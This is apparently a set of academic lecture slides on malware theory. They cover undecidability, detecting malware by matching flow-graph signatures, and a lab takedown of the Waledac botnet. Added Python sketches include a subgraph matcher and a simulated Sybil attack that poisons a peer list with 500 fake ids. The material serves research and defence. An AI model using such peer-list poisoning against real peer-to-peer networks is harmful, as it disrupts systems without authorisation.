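The reduction can be sketched as a program transformer. This follows the standard textbook argument rather than anything shown on the slide, and the names `reduce_halting_to_property` and `witness` are hypothetical. It assumes, without loss of generality, that the nowhere-defined function does not satisfy P and that `witness` computes a function that does.

```python
from typing import Callable

def reduce_halting_to_property(
    m: Callable[[int], object],
    x: int,
    witness: Callable[[int], object],
) -> Callable[[int], object]:
    """Build Q: Q computes `witness` if m halts on x, and diverges everywhere otherwise."""
    def q(y: int) -> object:
        m(x)                 # step 1: never returns exactly when m diverges on x
        return witness(y)    # step 2: reached only if m(x) halted
    return q

# Halting case only (a diverging m would make q loop forever, by design).
q = reduce_halting_to_property(lambda n: n + 1, 3, lambda y: y * 2)
print(q(5))
```

Q satisfies P exactly when m halts on x, so a decision procedure for P would decide the halting problem.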

Morphological analysis in a nutshell

            Signatures are abstract flow graphs

            Detection: search for a signature as a subgraph of the program flow graph abstraction
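
Subgraph detection can be sketched with a naive backtracking search over labelled directed graphs. This is not the authors' algorithm: the graph encoding, the node labels and the function name `find_subgraph` are assumptions, and the search is exponential in the worst case.

```python
from typing import Dict, List, Optional, Set, Tuple

Graph = Tuple[Dict[str, str], Set[Tuple[str, str]]]   # (node -> label, edges)

def find_subgraph(sig: Graph, prog: Graph) -> Optional[Dict[str, str]]:
    """Return an injective, label- and edge-preserving map sig -> prog, or None."""
    s_labels, s_edges = sig
    p_labels, p_edges = prog
    order: List[str] = list(s_labels)

    def extend(mapping: Dict[str, str]) -> Optional[Dict[str, str]]:
        if len(mapping) == len(order):
            return mapping
        node = order[len(mapping)]
        for cand, label in p_labels.items():
            if label != s_labels[node] or cand in mapping.values():
                continue
            trial = {**mapping, node: cand}
            # Every signature edge between already-mapped nodes must exist in prog.
            if all((trial[a], trial[b]) in p_edges
                   for a, b in s_edges if a in trial and b in trial):
                found = extend(trial)
                if found is not None:
                    return found
        return None

    return extend({})

# Hypothetical signature: a call/jcc loop followed by another call.
signature: Graph = ({"s1": "call", "s2": "jcc", "s3": "call"},
                    {("s1", "s2"), ("s2", "s1"), ("s2", "s3")})
program: Graph = ({"n0": "inst", "n1": "call", "n2": "jcc", "n3": "call", "n4": "ret"},
                  {("n0", "n1"), ("n1", "n2"), ("n2", "n1"), ("n2", "n3"), ("n3", "n4")})
clean: Graph = (program[0], {("n0", "n1"), ("n1", "n2"), ("n2", "n3"), ("n3", "n4")})

print(find_subgraph(signature, program))
print(find_subgraph(signature, clean))
```

Because the match depends on graph shape and node labels rather than on exact bytes, renaming registers or reordering independent instructions does not break it in this model.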
Automatic construction of signatures

Reduction of signatures by graph rewriting

Morphological detection: Results

      • False negatives

            • No experiment on unknown malware

            • Signatures with fewer than 18 nodes are potential false negatives

            • Restricted signatures of 20 nodes are efficient

      • Less than 3 sec. for signatures of 500 nodes

Conclusion about morphological detection

      • Benchmarks are good

      • Pros

            • More robust against local mutations and obfuscation

            • Easily detects variants of the same malware family

            • Tries to take program semantics into account

            • Quasi-automatic generation of signatures

      • Cons

            • Difficult to statically determine the flow graph of self-modifying programs

            • Requires a combination of static and dynamic analysis

Reference

        • Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a
          morphological malware detector, Journal in Computer Virology, Springer 2008.

Waledac, again ....

      • How to neutralize a botnet?

      • Send in the US Marshals (see the recent Rustock story)

      • Design an attack

            • Good understanding of the mechanisms of a botnet (reverse engineering)

            • Find an attack

            • Large-scale experiments in vitro

Waledac Peer-to-peer communication protocol

      • Each peer maintains a list of known peers (RLIST)

      • Bots exchange parts of their RLIST on a regular basis to maintain connectivity

      • Fallback mechanism over HTTP to fetch new peers

      [Figure: RLIST update message, sorted by local time: a global timestamp (1244053204),
       then entries each carrying a repeater id (e.g. 691775154c03424d9f12c17fdf4b640b)
       and a local timestamp]
Waledac Peer-to-peer communication protocol

      • Updates are based on the most recent timestamps

      • The IP address does not identify a peer

      • The id identifies a peer

      • Vulnerability to Sybil attack

      • Craft an RLIST update to put «myIP» on the top-500 list

      [Figure: crafted RLIST update: the value 0, then ids 00000000000000000000000000000001
       ... 00000000000000000000000000000500]
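
The Sybil idea above can be simulated in a few lines. This is a sketch under loud assumptions: the merge rule (keep the freshest entry per id, then the 500 most recent), the `Peer` fields, and the helper names `merge` and `sybil_update` are guesses modelled on the bullets, not the actual Waledac implementation. The IP address is a documentation address.

```python
from dataclasses import dataclass
from typing import Dict, List

RLIST_SIZE = 500   # assumption: the "top-500" list mentioned above

@dataclass(frozen=True)
class Peer:
    peer_id: str     # 32 digits; the id, not the IP, identifies the peer
    ip: str
    timestamp: int   # freshness of the entry

def merge(rlist: List[Peer], update: List[Peer]) -> List[Peer]:
    """Keep, per id, the freshest entry; then keep the RLIST_SIZE most recent."""
    best: Dict[str, Peer] = {}
    for p in rlist + update:
        if p.peer_id not in best or p.timestamp > best[p.peer_id].timestamp:
            best[p.peer_id] = p
    return sorted(best.values(), key=lambda p: p.timestamp, reverse=True)[:RLIST_SIZE]

def sybil_update(my_ip: str, now: int) -> List[Peer]:
    """Craft 500 fake ids (...0001 to ...0500), all fresh, all pointing to my_ip."""
    return [Peer(f"{i:032d}", my_ip, now) for i in range(1, RLIST_SIZE + 1)]

# Hypothetical honest RLIST of 500 peers with slightly older timestamps.
honest = [Peer(f"{0xabc000 + i:032x}", f"10.0.{i // 256}.{i % 256}", 1244053204 - i)
          for i in range(500)]
poisoned = merge(honest, sybil_update("192.0.2.1", 1244053204 + 60))

print(len(poisoned), {p.ip for p in poisoned})
```

Since peers are identified by id only, one machine can claim 500 identities, and fresher timestamps push every honest entry out of the list.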
                                              
Botnet neutralization in the lab
      [Figure: attack scenario: protectors, repeaters, spammers, an attacker, sybils, and a white C&C]
A Sybil attack

Spam sent by the botnet

Rlist infections for repeaters

High Security Lab @ Nancy

                                   lhs.loria.fr

    Telescope & honeypots
    In vitro experiment clusters

Conclusions

Conclusion

      • Mathematical definitions of malware with tools

            • High level representation of binaries

            • Abstract signatures which are robust w.r.t. obfuscations

      • Experiments theories

            • Analyzing tools combining static and dynamic analysis

            • Detection and neutralization heuristics

Thanks !
